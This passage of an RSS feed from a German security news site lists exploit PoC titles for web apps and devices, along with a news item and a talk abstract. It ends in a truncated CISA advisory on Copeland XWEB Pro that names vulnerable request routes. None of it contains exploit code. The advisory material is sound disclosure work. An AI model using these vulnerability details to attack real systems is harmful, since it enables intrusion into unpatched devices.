<pubDate>Wed, 29 Apr 2026 07:52:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Xibo CMS  4.3.0 - RCE via SSTI]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LangChain Core 1.2.4 - SSTI/RCE]]></title>
<description><![CDATA[LangChain Core 1.2.4 - SSTI/RCE]]></description>
<link>https://tsecurity.de/de/3473318/poc/webapps-langchain-core-124-sstirce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473318/poc/webapps-langchain-core-124-sstirce/</guid>
<pubDate>Wed, 29 Apr 2026 07:36:01 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LangChain Core 1.2.4 - SSTI/RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[GeoExt Mobile (GXM) (fossgis2012)]]></title>
<description><![CDATA[GeoExt Mobile (GXM, https://github.com/geoext/GXM und http://trac.geoext.org/wiki/mobile) ist eine noch junge Open Source Bibliothek, welche die Funktionalitäten von OpenLayers (http://openlayers.org/) und Sencha Touch (http://www.sencha.com/products/touch) verknüpft, um Entwickler in die Lage zu...]]></description>
<link>https://tsecurity.de/de/3469160/it-security-video/geoext-mobile-gxm-fossgis2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3469160/it-security-video/geoext-mobile-gxm-fossgis2012/</guid>
<pubDate>Mon, 27 Apr 2026 20:47:35 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GeoExt Mobile (GXM, https://github.com/geoext/GXM und http://trac.geoext.org/wiki/mobile) ist eine noch junge Open Source Bibliothek, welche die Funktionalitäten von OpenLayers (http://openlayers.org/) und Sencha Touch (http://www.sencha.com/products/touch) verknüpft, um Entwickler in die Lage zu versetzen, mobile WebGIS-Anwendungen (WebApps) zu erstellen. Hierbei können die vielfältigen Möglichkeiten der Basisbibliotheken voll ausgenutzt werden:

  * Verwendung aller Kartentypen und Interaktionswerkzeuge, die OpenLayers unterstützt
  * Oberflächenelemente von Sencha Touch, die natives Look and Feel im mobilen Browser gewährleisten

Der Vortrag wird die Schwestersoftware von GeoExt (http://www.geoext.org/) vorstellen und deren Möglichkeiten aufzeigen. Hierbei werden die Entstehungsgeschichte der Software, die verfügbaren Klassen und auch Beispiele für den Einsatz von GXM in Kundenprojekten beleuchtet.


about this event: https://fossgis-konferenz.de/2012/programm/events/431.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[solaredge-CSRF-OOB-Injection]]></title>
<description><![CDATA[Topic: solaredge-CSRF-OOB-Injection Risk: Medium Text:# Titles: solaredge-CSRF-OOB-Injection  # Author: nu11secur1tyAI  # Date: 2026-04-26  # Vendor: SolarEdge Technologies Ltd.  # ...]]></description>
<link>https://tsecurity.de/de/3466388/sicherheitsluecken/solaredge-csrf-oob-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3466388/sicherheitsluecken/solaredge-csrf-oob-injection/</guid>
<pubDate>Sun, 26 Apr 2026 23:19:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: solaredge-CSRF-OOB-Injection Risk: Medium Text:# Titles: solaredge-CSRF-OOB-Injection  # Author: nu11secur1tyAI  # Date: 2026-04-26  # Vendor: SolarEdge Technologies Ltd.  # ...]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Plugin  5.2.0 - Broken Access Control]]></title>
<description><![CDATA[WordPress Plugin  5.2.0 - Broken Access Control]]></description>
<link>https://tsecurity.de/de/3454925/poc/webapps-wordpress-plugin-520-broken-access-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3454925/poc/webapps-wordpress-plugin-520-broken-access-control/</guid>
<pubDate>Wed, 22 Apr 2026 15:05:21 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Plugin  5.2.0 - Broken Access Control]]></content:encoded>
</item>
<item>
<title><![CDATA[Thüga-Umfrage: Cyberangriffe sind größte Bedrohung für Versorgungssicherheit]]></title>
<description><![CDATA[Die Wechselrichter von Solaredge erfüllen schon die Anforderungen an Cybersicherheit der EU-Kommission. Cyberangriffe sind aus Sicht kommunaler ...]]></description>
<link>https://tsecurity.de/de/3432622/it-security-nachrichten/thuega-umfrage-cyberangriffe-sind-groesste-bedrohung-fuer-versorgungssicherheit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3432622/it-security-nachrichten/thuega-umfrage-cyberangriffe-sind-groesste-bedrohung-fuer-versorgungssicherheit/</guid>
<pubDate>Tue, 14 Apr 2026 17:51:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Wechselrichter von Solaredge erfüllen schon die Anforderungen an <b>Cybersicherheit</b> der EU-Kommission. Cyberangriffe sind aus Sicht kommunaler ...]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] D-Link DIR-650IN - Authenticated Command Injection]]></title>
<description><![CDATA[D-Link DIR-650IN - Authenticated Command Injection]]></description>
<link>https://tsecurity.de/de/3423892/poc/webapps-d-link-dir-650in-authenticated-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3423892/poc/webapps-d-link-dir-650in-authenticated-command-injection/</guid>
<pubDate>Fri, 10 Apr 2026 16:11:05 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[D-Link DIR-650IN - Authenticated Command Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RomM  4.4.0 -  XSS_CSRF Chain]]></title>
<description><![CDATA[RomM  4.4.0 -  XSS_CSRF Chain]]></description>
<link>https://tsecurity.de/de/3421405/poc/webapps-romm-440-xsscsrf-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3421405/poc/webapps-romm-440-xsscsrf-chain/</guid>
<pubDate>Thu, 09 Apr 2026 19:53:30 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RomM  4.4.0 -  XSS_CSRF Chain]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] React Server 19.2.0 - Remote Code Execution]]></title>
<description><![CDATA[React Server 19.2.0 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3421404/poc/webapps-react-server-1920-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3421404/poc/webapps-react-server-1920-remote-code-execution/</guid>
<pubDate>Thu, 09 Apr 2026 19:53:29 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[React Server 19.2.0 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Jumbo Website Manager  - Remote Code Execution]]></title>
<description><![CDATA[Jumbo Website Manager  - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3421367/poc/webapps-jumbo-website-manager-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3421367/poc/webapps-jumbo-website-manager-remote-code-execution/</guid>
<pubDate>Thu, 09 Apr 2026 19:37:02 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jumbo Website Manager  - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] xibocms 3.3.4 - RCE]]></title>
<description><![CDATA[xibocms 3.3.4 - RCE]]></description>
<link>https://tsecurity.de/de/3417853/poc/webapps-xibocms-334-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3417853/poc/webapps-xibocms-334-rce/</guid>
<pubDate>Wed, 08 Apr 2026 17:22:15 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[xibocms 3.3.4 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] FortiWeb  8.0.2 - Remote Code Execution]]></title>
<description><![CDATA[FortiWeb  8.0.2 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3417851/poc/webapps-fortiweb-802-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3417851/poc/webapps-fortiweb-802-remote-code-execution/</guid>
<pubDate>Wed, 08 Apr 2026 17:22:12 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FortiWeb  8.0.2 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Horilla v1.3 - RCE]]></title>
<description><![CDATA[Horilla v1.3 - RCE]]></description>
<link>https://tsecurity.de/de/3417709/poc/webapps-horilla-v13-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3417709/poc/webapps-horilla-v13-rce/</guid>
<pubDate>Wed, 08 Apr 2026 16:38:38 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Horilla v1.3 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Fortinet FortiWeb v8.0.1 - Auth Bypass]]></title>
<description><![CDATA[Fortinet FortiWeb v8.0.1 - Auth Bypass]]></description>
<link>https://tsecurity.de/de/3411206/poc/webapps-fortinet-fortiweb-v801-auth-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411206/poc/webapps-fortinet-fortiweb-v801-auth-bypass/</guid>
<pubDate>Mon, 06 Apr 2026 15:22:41 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fortinet FortiWeb v8.0.1 - Auth Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] ASP.net  8.0.10 - Bypass]]></title>
<description><![CDATA[ASP.net  8.0.10 - Bypass]]></description>
<link>https://tsecurity.de/de/3411175/poc/webapps-aspnet-8010-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411175/poc/webapps-aspnet-8010-bypass/</guid>
<pubDate>Mon, 06 Apr 2026 15:09:37 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ASP.net  8.0.10 - Bypass]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress  Madara - Local File Inclusion]]></title>
<description><![CDATA[WordPress  Madara - Local File Inclusion]]></description>
<link>https://tsecurity.de/de/3411156/poc/webapps-wordpress-madara-local-file-inclusion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411156/poc/webapps-wordpress-madara-local-file-inclusion/</guid>
<pubDate>Mon, 06 Apr 2026 14:55:57 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress  Madara - Local File Inclusion]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WBCE CMS 1.6.4 - Remote Code Execution]]></title>
<description><![CDATA[WBCE CMS 1.6.4 - Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3411155/poc/webapps-wbce-cms-164-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411155/poc/webapps-wbce-cms-164-remote-code-execution/</guid>
<pubDate>Mon, 06 Apr 2026 14:55:55 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WBCE CMS 1.6.4 - Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RiteCMS 3.1.0 - Authenticated Remote Code Execution]]></title>
<description><![CDATA[RiteCMS 3.1.0 - Authenticated Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3411154/poc/webapps-ritecms-310-authenticated-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411154/poc/webapps-ritecms-310-authenticated-remote-code-execution/</guid>
<pubDate>Mon, 06 Apr 2026 14:55:54 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RiteCMS 3.1.0 - Authenticated Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Zhiyuan OA - arbitrary file upload leading]]></title>
<description><![CDATA[Zhiyuan OA - arbitrary file upload leading]]></description>
<link>https://tsecurity.de/de/3411153/poc/webapps-zhiyuan-oa-arbitrary-file-upload-leading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411153/poc/webapps-zhiyuan-oa-arbitrary-file-upload-leading/</guid>
<pubDate>Mon, 06 Apr 2026 14:55:52 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zhiyuan OA - arbitrary file upload leading]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Grafana 11.6.0 - SSRF]]></title>
<description><![CDATA[Grafana 11.6.0 - SSRF]]></description>
<link>https://tsecurity.de/de/3411152/poc/webapps-grafana-1160-ssrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3411152/poc/webapps-grafana-1160-ssrf/</guid>
<pubDate>Mon, 06 Apr 2026 14:55:51 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Grafana 11.6.0 - SSRF]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] mailcow 2025-01a - Host Header Password Reset Poisoning]]></title>
<description><![CDATA[mailcow 2025-01a - Host Header Password Reset Poisoning]]></description>
<link>https://tsecurity.de/de/3322361/poc/webapps-mailcow-2025-01a-host-header-password-reset-poisoning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3322361/poc/webapps-mailcow-2025-01a-host-header-password-reset-poisoning/</guid>
<pubDate>Tue, 03 Mar 2026 12:24:56 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[mailcow 2025-01a - Host Header Password Reset Poisoning]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Backup Migration 1.3.7 - Remote Command Execution]]></title>
<description><![CDATA[WordPress Backup Migration 1.3.7 - Remote Command Execution]]></description>
<link>https://tsecurity.de/de/3322360/poc/webapps-wordpress-backup-migration-137-remote-command-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3322360/poc/webapps-wordpress-backup-migration-137-remote-command-execution/</guid>
<pubDate>Tue, 03 Mar 2026 12:24:54 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Backup Migration 1.3.7 - Remote Command Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Easy File Sharing Web Server v7.2 - Buffer Overflow]]></title>
<description><![CDATA[Easy File Sharing Web Server v7.2 - Buffer Overflow]]></description>
<link>https://tsecurity.de/de/3322332/poc/webapps-easy-file-sharing-web-server-v72-buffer-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3322332/poc/webapps-easy-file-sharing-web-server-v72-buffer-overflow/</guid>
<pubDate>Tue, 03 Mar 2026 12:08:51 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Easy File Sharing Web Server v7.2 - Buffer Overflow]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WeGIA 3.5.0 - SQL Injection]]></title>
<description><![CDATA[WeGIA 3.5.0 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3322187/poc/webapps-wegia-350-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3322187/poc/webapps-wegia-350-sql-injection/</guid>
<pubDate>Tue, 03 Mar 2026 11:08:45 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WeGIA 3.5.0 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Boss Mini v1.4.0 - Local File Inclusion (LFI)]]></title>
<description><![CDATA[Boss Mini v1.4.0 - Local File Inclusion (LFI)]]></description>
<link>https://tsecurity.de/de/3322186/poc/webapps-boss-mini-v140-local-file-inclusion-lfi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3322186/poc/webapps-boss-mini-v140-local-file-inclusion-lfi/</guid>
<pubDate>Tue, 03 Mar 2026 11:08:43 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Boss Mini v1.4.0 - Local File Inclusion (LFI)]]></content:encoded>
</item>
<item>
<title><![CDATA[Copeland XWEB and XWEB Pro]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication, cause a denial-of-service condition, cause memory corruption, and execute arbitrary code.
The following versions of Copeland XWEB and XWEB Pro are affected:

XWEB 300D PRO]]></description>
<link>https://tsecurity.de/de/3313062/it-security-nachrichten/copeland-xweb-and-xweb-pro/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3313062/it-security-nachrichten/copeland-xweb-and-xweb-pro/</guid>
<pubDate>Thu, 26 Feb 2026 19:06:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-057-10.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication, cause a denial-of-service condition, cause memory corruption, and execute arbitrary code.</strong></p>
<p>The following versions of Copeland XWEB and XWEB Pro are affected:</p>
<ul>
<li>XWEB 300D PRO &lt;=1.12.1 (CVE-2026-25085, CVE-2026-21718, CVE-2026-24663, CVE-2026-21389, CVE-2026-25111, CVE-2026-20742, CVE-2026-24517, CVE-2026-25195, CVE-2026-20910, CVE-2026-24689, CVE-2026-25109, CVE-2026-20902, CVE-2026-24695, CVE-2026-25105, CVE-2026-24452, CVE-2026-23702, CVE-2026-25721, CVE-2026-20764, CVE-2026-25196, CVE-2026-25037, CVE-2026-22877, CVE-2026-20797, CVE-2026-3037)</li>
<li>XWEB 500D PRO &lt;=1.12.1 (CVE-2026-25085, CVE-2026-21718, CVE-2026-24663, CVE-2026-21389, CVE-2026-25111, CVE-2026-20742, CVE-2026-24517, CVE-2026-25195, CVE-2026-20910, CVE-2026-24689, CVE-2026-25109, CVE-2026-20902, CVE-2026-24695, CVE-2026-25105, CVE-2026-24452, CVE-2026-23702, CVE-2026-25721, CVE-2026-20764, CVE-2026-25196, CVE-2026-25037, CVE-2026-22877, CVE-2026-20797, CVE-2026-3037)</li>
<li>XWEB 500B PRO &lt;=1.12.1 (CVE-2026-25085, CVE-2026-21718, CVE-2026-24663, CVE-2026-21389, CVE-2026-25111, CVE-2026-20742, CVE-2026-24517, CVE-2026-25195, CVE-2026-20910, CVE-2026-24689, CVE-2026-25109, CVE-2026-20902, CVE-2026-24695, CVE-2026-25105, CVE-2026-24452, CVE-2026-23702, CVE-2026-25721, CVE-2026-20764, CVE-2026-25196, CVE-2026-25037, CVE-2026-22877, CVE-2026-20797, CVE-2026-3037)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 10</td>
<td>Copeland</td>
<td>Copeland XWEB and XWEB Pro</td>
<td>Unexpected Status Code or Return Value, Use of a Broken or Risky Cryptographic Algorithm, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Stack-based Buffer Overflow</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Commercial Facilities</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25085</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability exists in Copeland XWEB Pro version 1.12.1 and prior, in which an unexpected return value from the authentication routine is later on processed as a legitimate value, resulting in an authentication bypass.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25085">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/394.html">CWE-394 Unexpected Status Code or Return Value</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.6</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-21718</a></h3>
<div class="csaf-accordion-content">
<p>An authentication bypass vulnerability exists in Copeland XWEB Pro version 1.12.1 and prior, enabling any attackers to bypass the authentication requirement and achieve pre-authenticated code execution on the system.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21718">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/327.html">CWE-327 Use of a Broken or Risky Cryptographic Algorithm</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>10</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24663</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an unauthenticated attacker to achieve remote code execution on the system by sending a crafted request to the libraries installation route and injecting malicious input into the request body.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24663">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-21389</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the request body sent to the contacts import route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-21389">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25111</a></h3>
<div class="csaf-accordion-content">
